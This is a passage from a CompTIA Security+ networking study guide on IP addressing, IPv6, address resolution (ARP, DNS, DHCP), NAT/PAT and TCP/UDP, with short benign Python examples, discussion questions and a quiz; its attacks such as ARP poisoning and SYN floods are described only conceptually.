B       128-191       10           16,384         65,536        255.255.0.0     /16
C       192-223       110          2,097,152      256           255.255.255.0   /24
D       224-239       1110         *              *             *               *
E       240-254       1111         *              *             *               *

Of the five, only classes A, B, and C were actual address assignments. Class D was specified for destination-
only multicast addresses, while Class E networks were reserved for experimental use. You can probably see
the pattern in those three, however; while a class A network can have over 16 million hosts, only 128 class A
networks are possible. On the other hand, there are over 2 million Class C networks, each with up to 256
hosts. In any case, classful networking means you don't need to remember the subnet mask: it's obvious from
the IP address. For example, if you're given the address 144.201.5.32, you know that it's a member of a Class
B network, and therefore has a subnet mask of 255.255.0.0.
By the 1990s it was becoming apparent that classful addressing wasn't very flexible and, worse, was
causing the IPv4 address space to run out more quickly. The solution was classless interdomain routing
(CIDR). Under CIDR, any mask prefix number is allowed, so you can allocate a subnet of any size. For
example, the IANA could assign a Class A network (or /8) range to Asia's regional internet registry (RIR).
The RIR could then break it into 16 smaller /12 subnets of a million addresses apiece to assign to local
registries. In the end, a business might purchase a 1024 address allocation from its local registry, as a /22
subnet.

In the same way, you could also supernet four contiguous Class C (/24) networks, combining them into a
single /22 network. Of course, CIDR is backward compatible with classful networking: a /8, /16, or /24
network can still be defined.
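The same module can illustrate CIDR allocation. The sketch below mirrors the example above with invented blocks: a /8 broken into sixteen /12 subnets, and four contiguous /24 networks supernetted into a /22.

import ipaddress

# Breaking a /8 allocation into sixteen /12 blocks.
for subnet in ipaddress.ip_network("10.0.0.0/8").subnets(new_prefix=12):
    print(subnet)                   # 10.0.0.0/12, 10.16.0.0/12, ...

# Supernetting a /24 (and its three contiguous neighbors) into a single /22.
print(ipaddress.ip_network("192.168.4.0/24").supernet(new_prefix=22))   # 192.168.4.0/22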

Special IPv4 addresses


In addition to Class D and E addresses, some other specific ranges are reserved for special purposes. It's
important to know what they are, since any packet using one of them is either serving a specific purpose or
isn't legitimate traffic.
•  0.0.0.0 is a non-routable address which can either mean the current network, the default route, any
address at all, or a specific error condition, depending on context.
•  255.255.255.255 is the broadcast address to the currently configured subnet. Broadcasts aren't
generally routed, so any packet to this address is just sent through the local broadcast domain.
•  The entire Class A network 127.0.0.0 is reserved for loopback addresses, which as the name
implies simply point right back to the local host. Most commonly, you'll see 127.0.0.1 used to refer
to the local system.
•  Three private network ranges are defined for internal LANs. These network addresses aren't routable
on the Internet, but are instead commonly used on home or office networks.
    • 10.0.0.0/8, or the single Class A network with addresses 10.0.0.0 - 10.255.255.255
    • 172.16.0.0/12, or the 16 contiguous Class B networks with addresses 172.16.0.0 - 172.31.255.255
    • 192.168.0.0/16, or the 256 contiguous Class C networks with addresses 192.168.0.0 - 192.168.255.255
•  The 169.254.0.0/16 network is reserved for link-local or Automatic Private IP Addressing
(APIPA) addresses. When a host doesn't have an IP address configured and cannot receive one from a
server, it attempts to choose a unique random value from this range. These addresses are not routable,
but allow self-configuring IP based communication on local networks.
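These reserved ranges can also be recognized programmatically, which is handy when you're reviewing logs or writing filters. Here's a short sketch using the ipaddress module's built-in properties; the sample addresses are arbitrary.

import ipaddress

for addr in ("127.0.0.1", "10.1.2.3", "172.20.0.5", "192.168.1.10",
             "169.254.33.7", "8.8.8.8"):
    ip = ipaddress.ip_address(addr)
    # is_loopback, is_private, is_link_local, and is_global flag the special ranges.
    print(addr, ip.is_loopback, ip.is_private, ip.is_link_local, ip.is_global)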

IPv6
There are over four billion possible IPv4 addresses. When the internet was new that seemed like enough, but
they've been used up very rapidly even when you don't account for inefficient assignment and special address
types. Despite some stopgap measures, in 2011 the IANA ran out of unallocated IP addresses, and the various
RIRs have been running out one by one.
The ultimate solution will be the adoption of the newest version: Internet Protocol version 6, or IPv6. IPv6
uses a 128-bit address: this allows 2^128 addresses, or over a trillion for each square meter of the Earth's
surface. IPv6 offers several other advantages over IPv4 beyond more addresses too. It allows easier network
configuration, more efficient routing and data flow, and even improved security. The primary drawback is that
it's a much different protocol from IPv4, and isn't backwards-compatible. Today, while many devices and
organizations support it, it's not yet possible to access the entire Internet using IPv6, and might not be for
some time.
Until IPv6 is fully implemented, networks are using a number of migration strategies. Some networks use
tunneling to connect two IPv6 networks over an IPv4 network. Others use network address translation to
connect IPv4 and IPv6 networks. Still others simply run IPv4 and IPv6 on the same hosts and routers: this
allows you to use IPv6 if your entire path supports it, and IPv4 if not.

IPv6 addresses
The drawback of IPv6 addresses is that they're even bigger on paper than IPv4. Instead of dotted decimal,
they're written as 32 hexadecimal digits, broken into eight groups of four separated by colons.
fe80:0000:0000:0000:c249:3765:00c0:9b22

It might seem very long, but there are some writing conventions you can use to compress addresses with a lot
of zeros. This is important since most IPv6 addresses don't actually use all of their available space.
•  Leading zeros in a group don't need to be displayed, so :00c0: can be displayed as :c0: instead.
•  A group consisting entirely of zeros can be displayed as :0:
•  Once per address, multiple consecutive groups of zeros can be replaced with a double-colon. This
means :0000:0000:0000: can be written as :: instead.

Using this method, the same address could be written as follows.


fe80::c249:3765:c0:9b22
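You can check the compression rules with the ipaddress module, which follows the same conventions; this sketch simply round-trips the address from the example above.

import ipaddress

addr = ipaddress.ip_address("fe80:0000:0000:0000:c249:3765:00c0:9b22")
print(addr.compressed)   # fe80::c249:3765:c0:9b22
print(addr.exploded)     # fe80:0000:0000:0000:c249:3765:00c0:9b22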

In a typical IPv6 address, the first 64 bits is the network prefix, while the last 64 bits is the device identifier.
•  In turn, the network prefix can be broken up into a 48-bit global routing prefix used by routers on the
larger network, and a 16-bit subnet ID used for subnetting inside an organization.
•  The device identifier isn't just an arbitrary number: by default it's the device's EUI-64 hardware
address. Since the EUI-64 is either equal to or can be derived from its MAC address, this eases
assignment of unique host addresses on the subnet and helps to unify the network's physical and logical
addressing.

The prefix length can vary with different special address types: like with CIDR addresses, you follow the
overall address with the prefix length, like /48. Like with IPv4, you can specify an entire network by
showing the device identifier, and optionally subnet, as zeros, with normal compression. For example, the
following would be valid names for the same network.
2001:d18:c34d:0:0:0:0:0/48
2001:d18:c34d::/48

IPv6 address scopes


Every IPv6 address has a scope, which is the distance an address is relevant across the wider network. The
scope of an address can usually be easily told from its network ID. Unicast IPv6 addresses which refer to a
single host can be one of four scopes.

Loopback ::1/128 returns to the same interface. Equivalent to 127.0.0.1/8 in IPv4.


Link-local Usable on the local segment, but not routable. Like IPv4's APIPA, but all IPv6
nodes keep a link-local address even if they're also assigned a public address.
Link-local addresses always start with fe80 followed by 54 zero bits, then the
EUI-64, so they're easy to recognize and require no external configuration.
Formally the link-local network uses the address block fe80::/10, while the
individual addresses use the prefix fe80::/64.
Site-local Routable within an organization, but not on public networks, much like IPv4
private networks. Site-local addresses all start in the range fec0 to feff
followed by 38 zero bits and a 16-bit subnet field. Site-local addressing has been
deprecated, but you might still find it used on existing networks.
Global Routable on public networks such as the Internet. At present, all global unicast
addresses are allocated from the 2000::/3 block, which means they all start
with the bits 001, and the first group is in the range 2000-3fff. Just like IPv4
addresses, the IANA assigns them to RIRs for subnetting on the regional/ISP
level.

Multicast is a lot more widely used in IPv6 than it is in IPv4, partly because it's taken over the duties formerly
served by broadcast. It's more efficient than broadcast: scope allows strict control over how far a given
multicast reaches, and unlike a broadcast, a given node only responds to multicast addresses it's been
configured for. That way, a message relevant only to servers or routers can be sent to a multicast address other
hosts will simply ignore.
Multicast addresses always begin with 1111 1111, or FF. After that is a four-bit flag field, then a four-bit
scope field. Like with unicast addresses, scope can range from loopback to global, and flags are a more
technical matter. Globally routable multicast addresses must be assigned by the IANA.
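The ipaddress module also exposes scope-related properties, which can be a quick way to classify an address you run across. This is only an illustrative sketch; 2606:4700:4700::1111 is a well-known public resolver address used here as a global example.

import ipaddress

for addr in ("::1", "fe80::c249:3765:c0:9b22", "2606:4700:4700::1111", "ff02::1"):
    ip = ipaddress.ip_address(addr)
    print(f"{addr:28} loopback={ip.is_loopback} link_local={ip.is_link_local} "
          f"global={ip.is_global} multicast={ip.is_multicast}")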

Discussion: IP addresses
1. How does the network ID in an IPv4 address relate to the host ID?
The network ID on the left identifies the subnet the host belongs to, and the host ID on the right identifies
its place on that subnet. Each can vary in length, but the two together are always 32 bits.
2. In the CIDR address 10.25.100.1 /18, what does /18 mean?
The subnet mask value is 18 consecutive 1 bits followed by 14 0 bits, in other words 255.255.192.0.
3. Why is IPv6 being adopted?
The most pressing reason is the depletion of available IPv4 addresses, but it also makes network
configuration easier, routing more efficient, and security stronger.
4. What address scopes can an IPv6 unicast address have?
From smallest to largest: loopback, link-local, site-local, and global.

Address resolution
IP addresses are at the core of modern networking, but you probably already know there's more to it than that.
On the Data Link layer computers still communicate using physical MAC addresses, while humans, and some
higher level applications, prefer to use text-based domain names such as google.com or comptia.org. The
process of using a higher level address to find out a lower level address is called address resolution.
Address resolution by its nature causes security vulnerabilities. At the simplest level, an attacker can target
address resolution as a denial of service attack—even if the network path is still there, users and applications
will be left unable to find it. More sophisticated attacks instead corrupt address resolution processes,
transparently redirecting traffic to the wrong location. This enables eavesdropping or man-in-the-middle
attacks that users never even notice.

Physical address resolution


When two nodes on the same network segment want to communicate, they might have each other's IP
addresses, but need to learn each other's MAC addresses. Even if it's a host sending packets to its default
gateway, or a router to one of its local hosts, it needs to know the physical address, not just the IP, in order to
send frames there. In IPv4, nodes use the Address Resolution Protocol (ARP). ARP is part of the Link layer of
the TCP/IP model, but it doesn't fit neatly into the OSI model. Sometimes it's called a Layer 2.5 protocol,
since it operates between the Data Link and Network layers.
When a host wants to send an IP packet, it first looks for the recipient in its ARP cache, a list of IP addresses
and their corresponding hardware addresses—in modern networks, almost always MAC addresses. If it's not
there, it sends a broadcast packet called an ARP request over the local network, containing the target's IP
address and the sender's IP and hardware address. Since the packet is broadcast, every node receives it, but
only the target recognizes its IP address. The target responds to the sender with another packet, giving both its
IP and hardware addresses. Finally each host adds the other to its ARP cache.

Hosts also use ARP to announce themselves when they join a network, or to verify that a newly assigned IP
address isn't already in use.
ARP poisoning attacks work by an attacker hijacking this process, sending spoofed ARP messages to associate
the attacker's MAC address with the IP of another host. Since ARP is limited to local network segments, it's
generally only performed by an inside attacker, but it can be used to block, eavesdrop on, or modify traffic.
In IPv6, ARP is replaced by the Neighbor Discovery Protocol (NDP). In addition to ARP's functions, NDP
allows hosts to get other information, like the nearest router, or the network's MTU value.
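If you want to see what resolutions a host has already cached, Linux exposes the ARP cache as a plain text file. The sketch below assumes the typical /proc/net/arp column layout and is Linux-specific; other platforms show the cache through commands such as arp -a instead.

# Minimal sketch: list cached IP-to-MAC mappings on a Linux host.
def read_arp_cache(path="/proc/net/arp"):
    entries = []
    with open(path) as f:
        next(f)                            # skip the header row
        for line in f:
            fields = line.split()
            if len(fields) >= 6:           # IP, HW type, Flags, HW address, Mask, Device
                entries.append({"ip": fields[0], "mac": fields[3], "device": fields[5]})
    return entries

for entry in read_arp_cache():
    print(entry["ip"], "->", entry["mac"], "on", entry["device"])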

The Domain Name System


You've certainly seen domain names: anyone using the Internet has. When you enter a fully qualified domain
name (FQDN), like www.javatucana.com, the computer transparently resolves it to an IP address, like
64.99.80.30. When everything's working right, it happens nearly instantly, and you never even have to
worry about the IP address at all. This all happens through the Domain Name System (DNS), a hierarchical
directory service that stores assigned domain names and their corresponding IP addresses.
Domain names are also arranged in a logical hierarchy, but a different one than IP addresses. An FQDN
contains multiple case-insensitive text fields, separated by dots. Unlike IP addresses, the specific host of an
FQDN is on the left rather than the right. There's no fixed number of fields, but to be routed to a specific
computer over the internet, it must have a top level domain (TLD) such as .com or .uk, a domain name
representing an organization within the TLD, and a host name representing a specific host within the domain.
A domain can also add any number of subdomains between itself and the host.

DNS resolution
Exam Objective: CompTIA SY0-501 2.6.1.1, 2.6.2.7
For DNS resolution, a host must be configured with the address of a DNS server or name server. When the
host encounters an FQDN that's not already in its DNS cache or its hosts file, it sends a request to its DNS
server. In turn, the server checks against its own database of domains and addresses. If it doesn't know, it can
contact a higher level server, potentially going as far as the global root servers that maintain the entire DNS
hierarchy. Finally, the server sends the IP address of the FQDN, and the host adds it to its DNS cache.
Local name servers can also respond to partially qualified domain names, valid only within the domain. For
example, while you'd need to enter mail.corporate.javatucana.com to connect to that server from
the Internet, if you're inside Java Tucana's corporate network and querying its local DNS server, you could
probably just enter mail or mail.corporate.
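Scripts can use the host's resolver the same way applications do, which is useful for quick checks. The following sketch uses Python's standard socket library; the FQDN is the fictional example from this module, so on a real network it may simply fail to resolve.

import socket

fqdn = "www.javatucana.com"      # fictional example name from this module
try:
    # getaddrinfo() asks the operating system's resolver, which follows the
    # cache, hosts file, and DNS server process described above.
    for family, _, _, _, sockaddr in socket.getaddrinfo(fqdn, None):
        print(family.name, sockaddr[0])
except socket.gaierror as err:
    print("DNS resolution failed:", err)
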
A DNS server's database is comprised of a long list of resource records. Some of these records are the
FQDN/IP mappings used in the resolution process, but there are a wide variety of others. You can use DNS
requests to find a variety of information about a host or its domain, including host operating systems,
available mail servers, and even administrator contact information. Since domain names are assigned all the
time, and owners are free to change what host corresponds to what name whenever they like, DNS servers
constantly exchange and update records using the Dynamic DNS system.
Since DNS hosts constantly have to update their records, attackers can use DNS poisoning exploits to fill a
vulnerable DNS server's cache with incorrect information. This forces any host that contacts that server to
resolve addresses according to the attacker's choosing with no outward sign anything is wrong. A related
malware attack modifies the hosts file on individual systems to override valid DNS results.
Given that the DNS system is such an obvious way for an attacker to launch either DoS or MitM attacks, the
IETF developed the DNS Security (DNSSEC) Extensions to protect against DNS poisoning or other forgeries
by attackers. DNSSEC uses cryptographic signatures to authenticate all responses by secure DNS servers; it
guarantees message integrity, but not availability or confidentiality. While it protects against many attacks,
DNSSEC is challenging to implement on large scale networks, so its deployment to the worldwide internet is
still ongoing.

DHCP
It's a pain manually configuring IP addresses on a whole network, so unless there's a specific reason
otherwise, most hosts are assigned an address from a central Dynamic Host Configuration Protocol (DHCP)
server.

Exam Objective: CompTIA SY0-501 2.6.2.9


Actually there are two distinct protocols in use: DHCPv4 for IPv4 addresses, and DHCPv6 for IPv6
addresses. Each has its own specific functions, but they both share some common features.
•  A DHCP server contains a pool of available addresses, called a scope. The server assigns addresses
using leases, which are temporary but renewable assignments.
Note: This isn't the same as the scope of an IP address: instead it's an address range on the
subnet reserved for DHCP addresses.
•  Addresses can be assigned dynamically, or by reservation.
    • Dynamic assignment is first-come, first-served. Every time a client connects to the network, it might
have a different IP address.
    • Reserved assignment ties an IP address to a computer's unique hardware address. Whenever that computer
reconnects, it receives the same IP address. This can help with security and other network functions,
but it limits how many different computers can connect.
•  The DHCP server can assign additional network settings, called DHCP options. Common options
include:
    • Default gateway and other router addresses
    • DNS server addresses
    • Time server or time zone
•  If a DHCP server is not on the client's local segment, routers can be configured as DHCP relay agents.
This is necessary since a client with a self-assigned address cannot yet communicate outside of its
broadcast domain.
DHCP doesn't include any means for authentication, so it's difficult for a client to know it's communicating
with a legitimate server, or for a DHCP server to know a request comes from a legitimate client. This allows
for a range of attacks: unauthorized clients can retrieve network address assignments intended for legitimate
ones, or a rogue DHCP server can supply clients with false information such as malicious DNS servers. A
malicious client can even request multiple addresses using different credentials, exhausting the DHCP server's
pool of available addresses.
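To make the scope, lease, and reservation concepts concrete, here's a toy model of how a DHCP server might hand out addresses. It is not a real DHCP implementation, just a sketch with invented values.

import ipaddress

scope = list(ipaddress.ip_network("192.168.1.0/28").hosts())     # small example pool
reservations = {"aa:bb:cc:dd:ee:01": ipaddress.ip_address("192.168.1.10")}
leases = {}

def request_lease(mac):
    if mac in reservations:            # reserved assignment: same IP every time
        return reservations[mac]
    if mac in leases:                  # renewing an existing lease
        return leases[mac]
    for ip in scope:                   # dynamic assignment: first come, first served
        if ip not in leases.values() and ip not in reservations.values():
            leases[mac] = ip
            return ip
    return None                        # pool exhausted, as in a starvation attack

print(request_lease("aa:bb:cc:dd:ee:01"))   # 192.168.1.10 (reserved)
print(request_lease("aa:bb:cc:dd:ee:02"))   # first free dynamic address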

Discussion: Address resolution


1. Local host mocha wants to send a packet to remote host kona on its subnet. It knows kona's address is
192.168.100.20. Describe the address resolution process mocha needs to follow.
Mocha first will look in its ARP cache to see if it has kona's MAC address. If not, it will broadcast an
ARP request using kona's IP address. Kona then will respond with its MAC address. Mocha can then send
the packet. Afterward, both hosts add each other to their ARP caches.
2. What does each segment of the FQDN mocha.corporate.javatucana.coffee represent, and who assigned it?
mocha is the host name, and corporate a subdomain: both can be assigned internally by the company.
javatucana is a domain name, and was registered with and approved by a public domain registry. .coffee
is a top level domain, which was approved by the IANA.
3. You want to connect to mocha.corporate.javatucana.coffee over the Internet. Describe the address
resolution process your computer needs to follow.
Your computer will first look for mocha's IP address in its DNS cache. Assuming it isn't there, it will send a
DNS request to its DNS server. The server will check its own address records, and consult higher level
servers if necessary. Finally, it will send mocha's IP address to your computer, which will make the
connection and add mocha to its DNS cache.
4. What are three ways an attacker can compromise address resolution on a computer?
Changing the computer's hosts file via malware, compromising its DNS cache or that of its DNS server,
or using a fraudulent DHCP server to assign a malicious DNS server.

Address translation
Routers can also connect together two networks that use different address spaces. The most obvious reason is
when the networks use two different L3 protocols, like IP and IPX, or even IPv4 and IPv6; in these cases the
router needs to also convert between the two protocols. But when people mention network address translation
(NAT), what they usually mean is connecting two IPv4 networks that use different addressing schemes. In this
case, all the router really has to do is replace source or destination addresses in the IP header.

Exam Objective: CompTIA SY0-501 3.2.1.7

The most common reason for address translation is when a network using private IP address ranges needs to
connect to the internet. IPv4 exhaustion has made this the norm for home and small office networks: typically,
a consumer class router includes NAT by default. It's also commonly used as a security measure, but it
shouldn't be relied on for that unless it's a small part of a larger strategy. It can even cause problems; for
example, some security protocols like IPsec use address-based authentication, and have serious problems with
NAT traversal as a result. In practice, the security you gain from using a NAT-enabled router has more to do
with its other features such as an internal firewall.
NAT isn't generally necessary in IPv6, even if it's still possible. In fact, one of the main goals of IPv6
development was an address space so large that no network will have a shortage of routable public addresses.
In any case, the goal of NAT is to be transparent: neither the internal nor external hosts need to know it's
happening. This isn't easy, and it's seldom perfect, so there are a lot of little tricks a router has to use to
implement NAT effectively.

NAT methods
There are different methods for implementing NAT, depending on what the network's needs are and what address
space is available. To examine the basic methods and their comparative benefits it's easiest to imagine the
common situation of connecting a private IPv4 network to the internet. Remember that these methods are not
all mutually exclusive: NAT implementations in the real world frequently combine multiple methods.
The first way to classify NAT is by how addresses are allocated: this depends on how many public addresses
you have, and how many hosts need to connect to the Internet.

One-to-one Every internal host that connects to the outside network has its own public IP address,
which can either be statically or dynamically assigned from an available pool.
One-to-many Multiple internal hosts simultaneously share a single public IP address. Sometimes also
called NAT overload. While this can potentially allow every host on the network to connect
using a single public address, it makes it more difficult for the router to determine which
internal system is the correct destination for an inbound packet.

The other way to classify NAT is by who is initiating traffic: remote hosts contacting local hosts, or local
hosts contacting remote hosts. Both of these can work in one-to-one and one-to-many situations, though the
details will differ.

Source network Used when traffic is generally initiated by internal systems, for example, client
address translation workstations on the internal network that need to connect to internet servers. When
(SNAT) the local client opens a connection to the outside network, the router changes the
source address in the packet header to a valid public address. One security advantage
of SNAT is that an outside host can't easily initiate connections to local hosts, but
that's a disadvantage for running server applications.
Destination network Used when traffic is generally initiated by external systems, for example internet
address translation clients connecting to local servers. It's just the opposite of SNAT: the remote host
(DNAT) contacts the local host through a public IP address, and the router changes the
destination address in the header to a valid local address. The opposite happens to
response packets. DNAT works well when you have internal servers, but it requires
their address assignments to be configured ahead of time.

Note: The terminology for SNAT and DNAT is very confusing sometimes. In particular, Static NAT and
dynamic NAT refer to IP address allocation, and shouldn't be confused with SNAT and DNAT. Worse,
not everyone is consistent with terminology, so pay careful attention to context in NAT discussion or
documentation.

PAT
While a large network might use a pool of public IP addresses to implement one-to-one NAT allocation, the
typical small office or home network today only uses a single public IP address in a one-to-many
configuration. This means that most of the time today when you encounter discussion of NAT, it actually
refers to port address translation (PAT) used on consumer routers. This is especially true when people
mention limitations of NAT: very often, they're referring to the complications of multiple hosts sharing a
single address.
PAT is a form of SNAT: when an internal host wants to contact the internet, the router changes the source
address and watches for response packets. The added challenge is that since it's also a one-to-many NAT the
local host can't be assigned a unique IP address: it has to share with others. This means that inbound packets
to that address might target different hosts, and the router has to successfully multiplex them.
Fortunately, TCP/IP already has a way to do this, via port numbers. Any given conversation can be identified
by the combination of address and port number. The router just has to take care of one more problem:
ephemeral ports are assigned more or less at random by the operating system, and a given application might
be configured to listen on a specific port, so it's possible for two local hosts to simultaneously use the same
local port.

To keep things straight, the router also translates the source port as well as the source address, and does the
reverse to response packets. This ensures that every conversation maintains a unique identifier, without the
local host consuming a public IP address at all.
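One way to picture PAT is as a translation table keyed by private address and port. The sketch below is a simplified simulation with invented addresses, not a model of any particular router.

import itertools

PUBLIC_IP = "203.0.113.5"                      # invented public address
next_public_port = itertools.count(49152)      # start of the ephemeral range
nat_table = {}                                 # (private IP, private port) -> public port

def translate_outbound(private_ip, private_port):
    key = (private_ip, private_port)
    if key not in nat_table:                   # new conversation: pick a fresh public port
        nat_table[key] = next(next_public_port)
    return PUBLIC_IP, nat_table[key]

def translate_inbound(public_port):
    for (private_ip, private_port), port in nat_table.items():
        if port == public_port:                # reverse the translation for responses
            return private_ip, private_port
    return None                                # no matching conversation: drop the packet

print(translate_outbound("192.168.1.20", 51000))   # ('203.0.113.5', 49152)
print(translate_outbound("192.168.1.21", 51000))   # same private port, different public port
print(translate_inbound(49153))                    # ('192.168.1.21', 51000)
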
Since it's like SNAT, PAT is oriented for outgoing connections, not incoming ones. If you want to run a server
on a PAT network, you can do so by port forwarding. One limitation of this is that any given external port can
only point to one internal system: for instance, if you have one public IP address and multiple internal web
servers, only one of them can use the default port 80.

Discussion: Address translation


1. Aside from limited public IPv4 addresses, why might you use address translation?
It could be part of a security or privacy policy, or it could be a way to easily connect two networks using
different addressing schemes.
2. Compare and contrast PAT and port forwarding.
Both allow multiple hosts to share one public IP address, and both can be used at once, but otherwise
they're different. PAT dynamically translates outgoing port numbers to keep conversations separate, while
port forwarding statically associates particular incoming ports with corresponding internal hosts.
3. What NAT or PAT strategies does your home or office network use?
Answers may vary, but home and small office networks frequently use PAT for workstation connections.

4. How can NAT enhance security?
While not security methods in themselves, SNAT or PAT configurations add another barrier to outside
attackers making unsolicited connections to internal systems. On the down side, they're less compatible
with some network configurations.

Assessment: Network addressing


1. What might a router using PAT change on packets passing through? Choose all that apply.
•  Destination port for incoming packets
•  Destination port for outgoing packets
•  Destination address for incoming packets
•  Source address for incoming packets
•  Source port for incoming packets
•  Source port for outgoing packets

2. What protocol is used to find the MAC address of a given IP address? Choose the best response.
•  ARP
•  DHCP
•  APIPA
•  DNS

3. For a local server, you might not need the full domain name to perform a DNS lookup. True or false?
•  True
•  False

4. Which IPv4 address might be valid on the Internet? Choose the best response.
•  127.0.0.1
•  150.50.101.32
•  169.254.121.68
•  192.168.52.52

5. What network attack can only be used on local network segments?
•  ARP poisoning
•  DNS poisoning
•  DNS spoofing
•  Man in the middle

6. What protocol can be used to prevent DNS poisoning? Choose the best response.
•  DHCP
•  DNSSEC
•  FQDN
•  PAT

Module C: Network ports and applications


Above the Network layer, Transport layer protocols like TCP and UDP carry data destined for higher level
application protocols. Application protocols are associated with network ports which combine with IP address
to uniquely identify a communications session. Both of these are very important for security experts to
understand: network ports are essential in the configuration of firewalls and other security appliances, and
insecure application protocols are a large part of a system's potential attack surface.
You will learn:
•  About TCP and UDP
•  About network ports
•  About common network applications

Transport layer protocols


You've seen by now that the Network layer is more complex, and its protocols more "intelligent", than the
Data Link Layer, but at the same time it's still mostly about shoveling data through the network, with little
concern for what hosts do with it. Above it, the Transport layer serves as an interface between the network
and applications above, establishing end-to-end communications between hosts without needing application-
specific functions.
At the most basic level, a transport layer datagram carries data between the generic packets of the Network layer
and a specific port or socket, which is available to higher level protocols. This allows multiplexing at the host
level, so data used by a wide variety of applications can be transported over the same network connection.
Transport layer protocols can also be used to establish connections between hosts, perform error correction
and flow control, and ensure proper ordering of data.
In TCP/IP the most common transport layer protocols are Transmission Control Protocol (TCP) and User
Datagram Protocol (UDP). More specialized protocols include Datagram Congestion Control Protocol
(DCCP), Stream Control Transmission Protocol (SCTP), and Resource Reservation Protocol (RSVP).

TCP
You might have guessed that TCP is pretty important in the TCP/IP suite, and you're definitely right. It's by far
the most common protocol used for network data: web traffic, email, and other file transfer applications rely
heavily on TCP to connect hosts.
The data unit of TCP is called the segment, though it's functionally just a Layer 4 datagram in the OSI model.
In IP networks, TCP is a fully-featured transport layer protocol. It provides connection-oriented, reliable
communications, with error correction, flow control, and sequencing. All of those terms have pretty specific
meanings in this context.

Connection-oriented TCP negotiates a virtual connection between two hosts, a dedicated channel that
carries a defined stream of data to the remote host. This connection always requires
two-way communications: even if the ultimate goal is a one-way transfer, the
recipient must be able to acknowledge receipt of data.
Reliable TCP guarantees that all data is successfully delivered to the host. If a segment fails to
arrive, TCP itself handles discovering the failure and resending the segment.
Error correction A TCP segment itself contains a checksum which is used for error detection. Detected
errors are then corrected, since corrupt segments are discovered and resent just like
missing ones.


Flow control As part of the acknowledgement process, the remote host can regulate the rate of data
flow. This keeps a slow recipient from being overwhelmed by high speed
transmissions.
Sequencing When a long transmission must be broken into many segments, for example a large
file transfer, TCP can guarantee they will be delivered to the upper layers in the
correct sequence, even if the packets on the network arrived out of order. This keeps
applications from being burdened with reassembling fragmented transmissions.

TCP connections
Since it's connection-oriented and reliable, TCP is based around acknowledgement processes: the local host
always knows the remote host is listening and receiving intact data, even if the process is pretty transparent to
the end user unless something goes wrong. Since TCP plays such a prominent role both in carrying network data and in network attacks, you need to understand in principle how these acknowledgements work in order to secure networks.
A TCP connection starts with the two hosts exchanging control segments in what's called a three-way
handshake.

To initiate a connection, the local host sends a packet to a listening remote host. It can contain other
information about the desired connection, but the important part is one bit in the header called the synchronize
or SYN flag, marking it as a request to start a new connection.
The remote host needs to report that it received the request. TCP handles these reports through the
acknowledgement bit, or ACK flag. Since TCP connections are duplex, it needs to send a SYN flag too. So
the remote host replies with one packet that has both flags set.
Finally, the local host sends an ACK of its own to signal that it's received the response. Now the connection is
open, and the hosts can exchange data.
A similar handshake is used to break connections in an orderly way, using the FINish flag instead. It's not
three-way, though: each host's FIN/ACK exchange is done separately, for a total of four segments exchanged.
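You don't have to build these segments yourself to see the handshake happen: the operating system performs it whenever a TCP client opens a connection. The following Python sketch is only an illustration, with www.example.com and port 80 as placeholder targets; connect() triggers the complete three-way handshake, and close() triggers the FIN/ACK exchanges. Running it alongside a packet capture tool is a good way to watch the flags go by.

# Minimal sketch: the OS sends SYN, receives SYN/ACK, and sends ACK inside connect().
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)   # SOCK_STREAM selects TCP
s.settimeout(5)
s.connect(("www.example.com", 80))      # three-way handshake happens here
print("Connection open; data could now be exchanged")
s.close()                               # FIN/ACK exchanges tear the connection down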
The TCP handshake is another example of how an attacker can exploit ordinary protocol behavior to disrupt
network functions. In a SYN flood, an attacker bombards a vulnerable server with SYN packets seeming to
represent separate session requests, with no intention of actually opening connections. The server responds
normally, but all those requests consume resources since it's left listening for acknowledgments that never
come. Potentially it can be left without capacity to respond to legitimate clients.


UDP
TCP's features make it ideal for a lot of network traffic, but it's not perfect. Constant acknowledgements consume network bandwidth, error detection and correction slow transmissions down, and just about every feature
adds to the header size and the processing work both hosts have to do. If this was just the cost of making
network connections it would be one thing, but some kinds of network traffic don't need all of those features.
This is where the other major transport protocol comes in. UDP is everything TCP is not: it's unreliable,
connectionless, fast, and lightweight. The local host just sends datagrams without setting up a connection or
waiting for acknowledgement, which is good since the remote host never sends any. Datagrams have
checksums so corrupt data can be discarded, but there's no reliability so it's not resent. Everything's quick and
easy with UDP, but there are no guarantees.
This might make UDP sound like a nightmare for data networks, and for a lot of uses it is: that's why TCP is
the more popular of the two. But other times, UDP is a perfect fit.
 Some services' data streams are more time-sensitive than error sensitive, like streaming video or online
multiplayer games: the occasional glitch from a missing packet might be acceptable, but the whole
thing stopping for error correction and resending certainly isn't.
 Services relying on fast exchange of small amounts of data, like DNS or DHCP. For applications like
this, if the remote host doesn't reply promptly, the service can just ask again and still may be quicker
than if it took the time to arrange a TCP connection.
 Some applications are equipped to handle error correction and sequencing themselves: TCP would add
overhead by performing redundant services, so UDP is more efficient.

UDP is also usable by attackers, partly because even normal UDP datagrams aren't associated with formal communication sessions like TCP. A UDP flood attack bombards a host or network with large amounts of unsolicited UDP traffic, often in the form of unusually large packets. Not only can this saturate network capacity, but when properly targeted it can generate further traffic in the form of ICMP error messages and overwhelm the capacity of firewalls to respond effectively.
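Setting attacks aside, the basic contrast with TCP is easy to see in code. This Python sketch is an illustration only: 192.0.2.50 is a documentation-range placeholder address with nothing listening, and that's the point. The sender transmits its datagram with no handshake and, unless it sets its own timeout, never learns whether the data arrived.

# Minimal sketch: UDP sends datagrams without connections or acknowledgements.
import socket

u = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)    # SOCK_DGRAM selects UDP
u.settimeout(2)
u.sendto(b"hello", ("192.0.2.50", 5000))                 # no handshake, no delivery guarantee
try:
    data, addr = u.recvfrom(1024)                        # a reply arrives only if a server sends one
    print("Reply from", addr, data)
except socket.timeout:
    print("No reply; UDP gives no indication whether the datagram arrived")
u.close()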

Discussion: Transport layer protocols


1. What features separate TCP from UDP?
TCP is connection-oriented and reliable, while UDP is connectionless and unreliable. TCP has segments,
UDP has datagrams. TCP has error correction, sequencing, and flow control, while UDP has only basic
error detection via a checksum.
2. Label the parts of the TCP three-way handshake.

SYN, SYN/ACK, ACK


3. How does this process allow SYN flood attacks?
In a SYN flood, an attacker bombards a vulnerable server with SYN packets seeming to represent
separate session requests, with no intention of actually opening connections. The server responds
normally, but all those requests consume resources since it's left listening for acknowledgments that never
come. Potentially it can be left without capacity to respond to legitimate clients.


Network ports
When you open a connection to a remote host using its IP address, there's one more number that's important:
